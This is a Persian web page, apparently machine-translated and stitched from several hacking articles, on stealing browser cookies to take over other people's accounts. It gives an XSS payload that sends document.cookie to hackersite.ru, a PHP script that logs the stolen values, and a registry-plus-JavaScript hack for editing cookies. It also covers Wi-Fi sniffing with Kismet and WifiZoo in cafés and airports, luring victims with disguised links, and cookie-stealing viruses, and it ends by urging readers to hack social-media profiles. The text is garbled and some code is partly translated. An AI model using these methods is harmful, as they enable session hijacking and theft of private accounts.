تصور یک ابزار هک بیشتر از Metasploit دشوار است، و این چیزی است که بررسی امروز ما را به پایان می‌رساند. Metasploit بسته ای از ابزارهای مختلف است که وظیفه اصلی آن بهره برداری از آسیب پذیری ها در آن است نرم افزار. تصور کنید: حدود 1000 سوء استفاده قابل اعتماد، اثبات شده و ضروری در زندگی روزمره یک پنتستر - درست در گوشی هوشمند شما! با کمک چنین ابزاری می توانید واقعاً خود را در هر شبکه ای تثبیت کنید. Metasploit نه تنها به شما امکان سوء استفاده از نقص در برنامه های سرور را می دهد - ابزارهایی نیز برای حمله به برنامه های مشتری در دسترس هستند (به عنوان مثال، از طریق ماژول Browser Autopwn، زمانی که یک بار رزمی وارد ترافیک مشتری می شود). در اینجا باید گفت که نسخه موبایلهیچ جعبه ابزاری وجود ندارد، اما می‌توانید یک بسته استاندارد را با استفاده از دستگاه اپل نصب کنید.

کوکی چیست؟

مکانیزمی وجود دارد که به سرور http اجازه می دهد تا برخی از اطلاعات متنی را در رایانه کاربر ذخیره کند و سپس به آن دسترسی پیدا کند. این اطلاعاتبه نام کوکی در اصل، هر کوکی یک جفت است: نام یک پارامتر و مقدار آن. به هر کوکی دامنه ای که به آن تعلق دارد نیز اختصاص داده می شود. به دلایل امنیتی، در تمام مرورگرها سرور http فقط اجازه دسترسی به کوکی دامنه خود را دارد. علاوه بر این، کوکی‌ها ممکن است تاریخ انقضا داشته باشند، در این صورت حتی اگر تمام پنجره‌های مرورگر را ببندید، تا این تاریخ در رایانه ذخیره می‌شوند.


چرا کوکی ها مهم هستند؟

همه سیستم های چند کاربره از کوکی ها برای شناسایی کاربر استفاده می کنند. به طور دقیق تر، اتصال فعلی کاربر به سرویس، جلسه کاربر. اگر شخصی کوکی های شما را بشناسد، می تواند از طرف شما وارد سیستم شود. زیرا در در حال حاضرتعداد بسیار کمی از منابع اینترنتی تغییرات آدرس IP را در طول یک جلسه کاربر بررسی می کنند.


چگونه کوکی ها را تغییر یا جایگزین کنیم؟

توسعه دهندگان مرورگر ابزارهای داخلی را برای ویرایش کوکی ها ارائه نمی کنند. اما می توانید با یک دفترچه یادداشت معمولی از پس آن بربیایید.


مرحله 1: یک فایل متنی با متن ایجاد کنید

ویرایشگر رجیستری ویندوز نسخه 5.00



@="C:\\IE_ext.htm"

آن را با نام IE_ext.reg ذخیره کنید

مرحله 2: با استفاده از فایل ایجاد شده، تغییرات را به رجیستری ویندوز اضافه کنید.

مرحله 3: یک فایل متنی با متن ایجاد کنید

< script language="javascript">
external.menuArguments.clipboardData.setData("متن"، external.menuArguments.document.cookie);

external.menuArguments.document.cookie= "testname=testvalue; path=/; domain=testdomain.ru";
هشدار (external.menuArguments.document.cookie);


آن را با نام C:\IE_ext.htm ذخیره کنید

مرحله 4: به وب سایت مورد علاقه خود می رویم.

مرحله 5: روی فضای خالی صفحه کلیک راست کرده و آیتم منو را انتخاب کنید "کار با کوکی ها". اجازه دسترسی به کلیپ بورد. کوکی های شما از این سایت به کلیپ بورد می روند. می توانید دفترچه یادداشت آنها را وارد کنید و نگاهی بیندازید.


مرحله 6: برای تغییر برخی از کوکی ها، فایل C:\IE_ext.htm را ویرایش کنید و جایگزین کنید. نام آزمونبه نام کوکی، ارزش آزمایشی- در معنای آن، testdomain.ru– به دامنه سایت. در صورت لزوم، خطوط مشابه بیشتری اضافه کنید. برای سهولت کنترل، خروجی کوکی‌های فعلی را قبل و بعد از تغییر به اسکریپت اضافه کردم: هشدار (external.menuArguments.document.cookie);

مرحله 7: مرحله 5 را دوباره انجام دهید و سپس صفحه را بازخوانی کنید.

خط پایین: ما با کوکی های به روز شده به این منبع اینترنتی دسترسی خواهیم داشت.

چگونه با استفاده از جاوا اسکریپت کوکی ها را بدزدیم؟

اگر مهاجمی بتواند فرصتی برای اجرای یک اسکریپت جاوا اسکریپت دلخواه در رایانه قربانی پیدا کند، آنگاه می‌تواند کوکی‌های فعلی را به راحتی بخواند. مثال:


var str= document.cookie;

اما آیا او می تواند آنها را به سایت خود منتقل کند، زیرا همانطور که قبلاً اشاره کردم، یک اسکریپت جاوا اسکریپت نمی تواند بدون تأیید اضافی به سایتی که در دامنه دیگری قرار دارد دسترسی پیدا کند؟ به نظر می رسد که یک اسکریپت جاوا اسکریپت می تواند هر تصویری را که در هر سرور http قرار دارد بارگیری کند. در عین حال هرگونه اطلاعات متنی در درخواست دانلود را به این تصویر منتقل کنید. مثال: http://hackersite.ru/xss.jpg?text_infoبنابراین اگر این کد را اجرا کنید:

var img= عکس جدید()؛

img.src= "http://hackersite.ru/xss.jpg؟"+ encodeURI (document.cookie)؛


سپس کوکی به درخواست دانلود "تصویر" ختم می شود و به مهاجم "می رود".

چگونه می توان با چنین درخواست هایی برای دانلود یک "تصویر" برخورد کرد؟

یک مهاجم فقط باید میزبانی با پشتیبانی PHP پیدا کند و کدهایی مانند این را در آنجا قرار دهد:

$uid=urldcode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt"،"a");
fputs($fp,"$uid\n");
fclose($fp);
?>

سپس تمام پارامترهای درخواست برای این اسکریپت در فایل ذخیره می شود log.txt. تنها چیزی که باقی می ماند جایگزینی اسکریپت جاوا اسکریپت توصیف شده قبلی است http://hackersite.ru/xss.jpgبه مسیر این اسکریپت php.


خط پایین

من فقط ساده ترین راه را برای سوء استفاده از آسیب پذیری های XSS نشان دادم. اما این ثابت می‌کند که وجود حداقل یکی از این آسیب‌پذیری‌ها در یک سایت اینترنتی چند کاربره می‌تواند به مهاجم اجازه دهد از منابع آن از طرف شما استفاده کند.

سلام، این مقاله کوتاه، نه حتی یکنواخت توضیح کوتاهدوست دارم خودم را وقف کنم راه سادهرهگیری کوکی ها در شبکه های وای فای. اگر شخصی علاقه مند به رهگیری "کالاهای پخته شده" باشد، در اینجا به شما نمی گویم کوکی ها چیست و چرا به آنها نیاز است. در یک شبکه بی سیم، من فکر می کنم او باید بداند که چیست و چرا به آن نیاز دارد. من فقط یک چیز را می گویم: با استفاده از این فایل ها می توانید به حساب های افراد دیگر در سایت های مختلف دسترسی پیدا کنید که کاربران را ملزم به انجام فرآیند احراز هویت می کند (به عنوان مثال، mail.ru، vkontakte.ru و غیره).

پس بیایید شروع کنیم. ابتدا باید خود شبکه بی سیم را با یک دروازه دسترسی باز به اینترنت پیدا کنیم و مطلوب است که این شبکه کلاینت های بسیار زیادی داشته باشد. به عنوان مثال، هر شبکه ای در مراکز خرید بزرگ، فرودگاه ها، کافی شاپ های مختلف مناسب است؛ در چنین مکان هایی معمولا مردم استفاده می کنند. دسترسی به وای فایدر اینترنت، برای خواندن نامه، چک کردن حساب ها در سایت های دوستیابی مختلف، مشاهده LJ و انجمن های مختلف. این دقیقاً همان چیزی است که ما نیاز داریم. پس از تصمیم گیری در مورد انتخاب مکان شبکه، با مطالعه ساعات مشخصی از حداکثر تعداد مشتریان، اجازه دهید مستقیماً به عملیات رزمی برویم. برای این ما به یک لپ تاپ نیاز داریم آداپتور وای فای، و مجموعه خاصی از برنامه ها. در مورد من استفاده کردم لپ تاپ ایسر Aspire 3610، کارت وای فای مشتری D-Link DWL G650 و سیستم عامل BackTrack3 نصب شده است.

من به شما توصیه می کنم از این سیستم عامل استفاده کنید، زیرا از قبل شامل کل مجموعه برنامه هایی است که ممکن است به آن نیاز داشته باشید، و مهمترین مزیت این است که شما مجبور نیستید Backtrack را بر روی خود نصب کنید. HDD، می توانید این سیستم عامل را مستقیماً از یک سی دی یا فلش درایو بوت کنید.

حال به سراغ نرم افزارهای لازم می رویم. من از kismet برای کشف شبکه و WifiZoo برای رهگیری کوکی ها استفاده کردم. من به طور مفصل در مورد برنامه دوم صحبت خواهم کرد. WifiZoo یک اسکنر امواج هوایی غیرفعال است و مقدار زیادی را جمع آوری می کند اطلاعات مفیدمانند: pop3، ترافیک smtp، http cookies/authinfo، msn، اعتبارنامه ftp، ترافیک شبکه telnet، nbt و غیره. تنها ایراد این برنامه عدم وجود حالت پخش کانال است، WifiZoo به سادگی به رابط بی سیم گوش می دهد و به اصطلاح نمی تواند از کانالی به کانال دیگر بپرد. اما این عیب با برنامه دیگری به نام Kismet که از این حالت پشتیبانی می کند جبران می شود. برای راه اندازی WifiZoo شما نیاز دارید:

  • پایتون
  • پوسته پوسته شدن
  • کیسمت

پس بیایید برنامه را راه اندازی کنیم، ابتدا Kismet را برای پشتیبانی از حالت پرش کانال راه اندازی می کنیم، سپس WifiZoo را مستقیماً راه اندازی می کنیم، پنجره زیر باید در مقابل شما ظاهر شود:

اکنون تنها چیزی که باقی می‌ماند این است که بنشینید و منتظر بمانید تا چیزی را رهگیری کنید؛ هر چیزی که برنامه رهگیری می‌کند را می‌توان در لاگ‌هایی که در دایرکتوری با برنامه /logs/ قرار دارند، پیدا کرد. همچنین می توانید یک رابط رابط کاربری گرافیکی راه اندازی کنید که به طور خودکار به http در 127.0.0.1:8000 متصل می شود.

من در مورد تمام ویژگی های این برنامه فوق العاده نمی نویسم، فکر می کنم سایر ویژگی ها را خودتان متوجه خواهید شد و از آنجایی که در حال حاضر ما فقط به کوکی ها علاقه مند هستیم. روی پیوندی که می گوید کوکی ها کلیک کنید و ببینید چه چیزی را رهگیری کردیم:

راه های سرقت کوکی ها

این روش هک، سرقت کوکی ها، عالی عمل می کند و توسط بسیاری از هکرها استفاده می شود. اگر شما نیز می خواهید آن را امتحان کنید، اما نمی دانید چه کاری انجام دهید، توصیه های ما را بخوانید.

کوکی ها چیست؟

این اطلاعات مربوط به بازدید کاربر از یک سایت خاص است. در جای جداگانه ذخیره می شود سند متنی. در آنجا می توانید اطلاعات مختلفی پیدا کنید. از جمله ورود، رمز عبور، آدرس صندوق های پستیو شماره تلفن به همین دلیل است که سارقان تلاش می کنند تا به این اسناد دست یابند. هکرها برای سرقت مواد مورد نیاز خود به روش های مختلفی متوسل می شوند.

راه های سرقت کوکی ها

آسیب پذیری XSS

می توان آن را در هر وب سایتی یافت و استفاده کرد. وقتی یک متخصص آسیب پذیری را پیدا می کند، کد خاصی را به آن تزریق می کند. بسته به هدف، کدها متفاوت هستند؛ آنها برای یک منبع خاص نوشته می شوند. هنگامی که کاربر از این صفحه بازدید می کند و آن را به روز می کند، همه تغییرات اعمال می شود. کد شروع به عمل می کند - در رایانه قربانی تعبیه شده و همه را جمع آوری می کند اطلاعات لازماز مرورگر

برای معرفی کد، می توانید از هر نوع آسیب پذیری استفاده کنید - خطا در یک منبع وب، در یک مرورگر یا در یک سیستم کامپیوتری.

2 نوع حمله XSS وجود دارد:

منفعل - به اسکریپت صفحه هدایت می شود. در این مورد، باید به دنبال آسیب پذیری در عناصر صفحه باشید. به عنوان مثال، یک برگه گفتگو، یک کادر جستجو، یک کاتالوگ ویدئو و غیره.

فعال - شما باید آنها را در سرور جستجو کنید. آنها به ویژه در انجمن ها، وبلاگ ها و چت های مختلف فراوان هستند.

چگونه یک فرد را مجبور به اعمال XSS کنیم؟

این کار آسان نیست، زیرا اغلب برای فعال کردن کد باید روی پیوند با آن کلیک کنید. می توانید پیوند را پنهان کنید و آن را در یک ایمیل همراه با یک پیشنهاد جالب ارسال کنید. به عنوان مثال، یک تخفیف بزرگ در یک فروشگاه آنلاین ارائه دهید. شما همچنین می توانید همه اینها را در تصویر پیاده سازی کنید. کاربر به احتمال زیاد آن را مشاهده خواهد کرد و به چیزی مشکوک نخواهد شد.

نصب اسنیفر

این یک پیاده سازی است برنامه های تخصصیبرای نظارت بر ترافیک در دستگاه شخص دیگری. sniffer به شما امکان می دهد جلسات ارسال شده را با داده های افراد دیگر رهگیری کنید. به این ترتیب می‌توانید همه لاگین‌ها و رمزهای عبور، آدرس‌ها، هر کدام را دریافت کنید اطلاعات مهمتوسط کاربر از طریق شبکه منتقل می شود. در این مورد، حملات اغلب بر روی داده های HTTP محافظت نشده انجام می شود. وای فای ناامن برای این کار خوب عمل می کند.

چندین روش برای پیاده سازی sniffer وجود دارد:

  • کپی ترافیک؛
  • تجزیه و تحلیل داده ها با استفاده از حملات ترافیکی؛
  • گوش دادن به رابط ها؛
  • معرفی یک sniffer به یک کانال شکستن.
جایگزینی کوکی ها

تمام داده ها به شکل اصلی خود در وب سرور ذخیره می شوند. اگر آنها را تغییر دهید، این یک جایگزین در نظر گرفته می شود. تمام مواد دریافتی را می توان در رایانه دیگری استفاده کرد. به این ترتیب به اطلاعات شخصی کاربر دسترسی کامل خواهید داشت. می‌توانید کوکی‌ها را با استفاده از تنظیمات مرورگر، افزونه‌ها یا برنامه‌های خاص تغییر دهید. ویرایش همچنین در هر دفترچه یادداشت استاندارد روی رایانه شخصی امکان پذیر است.

سرقت کوکی ها با استفاده از ویروس

کارشناسان توصیه می کنند که از کوکی ها استفاده نکنید مگر اینکه نیاز خاصی به آن وجود داشته باشد. اگر امکان غیرفعال کردن آنها وجود دارد، بهتر است این کار را انجام دهید. این به این دلیل است که کوکی ها بسیار آسیب پذیر هستند. آنها اغلب توسط مجرمان سرقت می شوند. حجم عظیمی از اطلاعات شخصی را می توان از این فایل ها به دست آورد. اطلاعات محرمانه، که علیه شخص مورد استفاده قرار خواهد گرفت. خطرناک ترین نوع فایل ها آنهایی هستند که پس از پایان جلسه در سیستم باقی می مانند.

کوکی ها اغلب با استفاده از یک ابزار ویروسی به سرقت می روند. این کار به سادگی انجام می شود. هر ابزار ایمن با ویروسی تعبیه شده است که مواد خاصی را روی رایانه جمع آوری می کند. برنامه ویروس به سرور صاحب خود متصل خواهد شد. برنامه باید طوری پیکربندی شود که مرورگر از آن به عنوان سرور پروکسی استفاده کند.

هنگامی که برنامه به رایانه شخصی قربانی می رسد، به طور خودکار شروع به جمع آوری تمام داده های ذخیره شده و ارسال آن به شما می کند.

ویروس ها متفاوت هستند، عملکرد آنها نیز ممکن است متفاوت باشد. برخی به شما این امکان را می دهند که به طور کامل مرورگر را کنترل کنید و هرگونه اطلاعات را مشاهده کنید. دیگران قادر به سرقت مواد محافظت شده هستند. برخی دیگر فقط داده های ناامن را جمع آوری می کنند.

ممکن است برای معرفی یک برنامه ویروس به رایانه شخص دیگری مشکل داشته باشید. لازم است کاربر را مجبور به دانلود و اجرای آن کنید. در اینجا می توانید نامه ای به همراه لینک برنامه برای او بفرستید یا برنامه را به عنوان امن منتقل کنید و منتظر بمانید تا شخص آن را از وب سایت شما دانلود کند.

چگونه از کوکی ها در برابر سرقت محافظت کنیم؟

بیشتر منابع وب به اندازه کافی محافظت نمی شوند. هکرها به راحتی آسیب پذیری ها و باگ ها را در این پلتفرم ها پیدا می کنند.

قوانین حفاظت از کوکی:

  1. شناسه رایانه را به جلسه فعلی پیوند دهید. سپس، هنگامی که از یک دستگاه شخص ثالث وارد سایت می شوید، یک جلسه جدید شروع می شود و داده های مربوط به جلسه قبلی بازیابی نمی شود.
  2. جلسه را به مرورگر پیوند دهید. همان اصل مانند پاراگراف قبل عمل خواهد کرد.
  3. رمزگذاری پارامترهای ارسال شده از طریق شبکه سپس اطلاعات ذخیره شده در سند قابل درک نخواهد بود. برای کسی که رهگیری کرده بی فایده خواهد بود. این تکنیک 100٪ از شما محافظت نمی کند؛ برخی از متخصصان می توانند هر ماده ای را رمزگشایی کنند.
  4. یک پوشه جداگانه برای شناسه ها ایجاد کنید.

چگونه از طریق کوکی ها رمز اکانت شخص دیگری را پیدا کنیم؟

برای به دست آوردن اطلاعات ورود به سیستم شخص دیگری، ابتدا باید به فایلی که در آن ذخیره شده است بروید.

برای کسانی که استفاده می کنند موزیلا فایرفاکسباید به تب tools بروید که در منوی اصلی قرار دارد. بعد در تنظیمات سیستم، بخش "محافظت" را پیدا خواهید کرد، جایی که باید تمام اطلاعات مهم در مورد حساب ها را در شبکه های اجتماعی جستجو کنید. همه رمزهای عبور پنهان هستند، بنابراین روی دکمه "نمایش" کلیک کنید. شما می توانید بلافاصله محافظت را نصب کنید و یک کد ویژه قرار دهید. سپس هیچکس جز شما این اطلاعات را دریافت نخواهد کرد.

در Opera فقط نام های کاربری برای مشاهده عمومی در دسترس هستند. اما در منو می توانید یک مدیر رمز عبور پیدا کنید و همه چیز ذخیره شده در رایانه خود را مشاهده کنید. لیست کاملدر مدیر است. برای دسترسی به رمزهای عبور، باید افزونه دیگری را نصب کنید.

که در گوگل کرومهمه این مواد را می توان در تنظیمات پیشرفته مشاهده کرد. یک برگه با تمام کوکی های ذخیره شده وجود دارد.

متاسفانه، مرورگر استاندارد اینترنت اکسپلوررچنین عملکردهایی ندارد. برای کسب اطلاعات در مورد پلتفرم های وب که صاحب رایانه از آنها بازدید می کند، باید یک برنامه ویژه را دانلود کنید. شما می توانید آن را به صورت رایگان در اینترنت پیدا کنید، کاملا امن است، اما بهتر است آن را از منابع معتبر دانلود کنید. فراموش نکنید که هر برنامه ای باید توسط آنتی ویروس اسکن شود. این به ویژه برای آن دسته از ابزارهایی که با رمزهای عبور کار می کنند صادق است.

این تکنیک فقط برای کسانی مناسب است که دارند دسترسی فیزیکیبه کامپیوتر قربانی همچنین اگر شخص از طریق رایانه شخصی شما وارد پلتفرم شده باشد و داده های خود را ذخیره کرده باشد، می توانید رمز عبور شخص دیگری را نیز پیدا کنید.

برنامه هایی برای سرقت کوکی ها

انجمن های هکرهای زیادی در اینترنت وجود دارد که در آن هکرها با یکدیگر ارتباط برقرار می کنند. مردم به امید دریافت کمک رایگان به آنجا می روند. آنجاست که می توانید تعداد زیادی برنامه مختلف برای هک پیدا کنید. ما می خواهیم به شما هشدار دهیم که نباید به این برنامه ها اعتماد کنید. ابزارهای کمکی برای سرقت کوکی ها از راه دور از دستگاه شخص دیگری، برنامه های ساختگی یا ویروسی هستند. اگر این نرم افزار را بر روی کامپیوتر خود دانلود کنید، به احتمال زیاد در دام یک کلاهبردار قرار خواهید گرفت. کلاهبرداران برنامه ها را به صورت رایگان ارسال می کنند. بنابراین، آنها نرم افزار ویروس را توزیع می کنند و کنترل رایانه های شخصی دیگران را به دست می آورند. به طور کلی، چنین برنامه هایی کلاهبرداری هستند، این را با رابط کاربری و محتوای آنها متوجه خواهید شد. اگر قصد دارید از هر نرم افزاری برای استخراج فایل ها استفاده کنید، بگذارید sniffers باشد. البته استفاده از آنها چندان آسان نیست. و پیدا کردن یک اسنیفر خوب در اینترنت کار آسانی نیست. اما چنین نرم افزاری در دسترس متخصصانی است که می توانند آن را با پول به شما بفروشند. به یاد داشته باشید که کلاهبرداران زیادی وجود دارند که هر کدام ترفندهای خاص خود را دارند. شما فقط باید به هکرهای قابل اعتمادی اعتماد کنید که شهرت خوبی دارند، نظرات خود را دارند و وب سایت خود را دارند.

در خاتمه، می خواهم توجه داشته باشم که سرقت کوکی ها یک روش واقعا قدرتمند است که اثربخشی آن بسیار بالا است. اگر می خواهید پروفایل شخصی را در یک شبکه اجتماعی یا پیام رسان فوری هک کنید، حتما این گزینه را در نظر بگیرید. این روش زمانی بهترین کار را دارد که بتوانید از رایانه قربانی استفاده کنید. به دست آوردن مواد از راه دور بسیار دشوارتر است، اما می توانید از نکات ما استفاده کنید و سعی کنید این روش را عملی کنید.

در فصل



 


خواندن:



رتبه بندی بهترین هدفون های بی سیم

رتبه بندی بهترین هدفون های بی سیم

آیا می توان گوش های یونیورسال را با قیمت ارزان خریداری کرد؟ 3000 روبل - آیا می توان برای چنین پولی هدفون های باکیفیت خریداری کرد؟ همانطور که معلوم شد، بله. و گفتار...

دوربین اصلی موبایل معمولاً در پشت بدنه قرار دارد و برای گرفتن عکس و فیلم استفاده می شود

دوربین اصلی موبایل معمولاً در پشت بدنه قرار دارد و برای گرفتن عکس و فیلم استفاده می شود

نسخه به روز شده تبلت با ویژگی های بهبود یافته و استقلال بالا. گوشی های هوشمند ایسر به ندرت بازدید می شوند...

چگونه با حفظ شماره خود به اپراتور دیگری سوئیچ کنید

چگونه با حفظ شماره خود به اپراتور دیگری سوئیچ کنید

قانون حفظ شماره تلفن هنگام تغییر مشترک به اپراتور تلفن همراه دیگر در روسیه از اول دسامبر به اجرا درآمد. با این حال، مشخص شد که ...

بررسی یک فبلت، گران، اما بسیار شایسته

بررسی یک فبلت، گران، اما بسیار شایسته

نقد و بررسی یک فبلت گران قیمت اما بسیار شایسته 1394/03/20 من تنها کفاش در جهان بدون چکمه، منتقد گوشی هوشمند بدون گوشی هوشمند خودم هستم ....

فید-تصویر RSS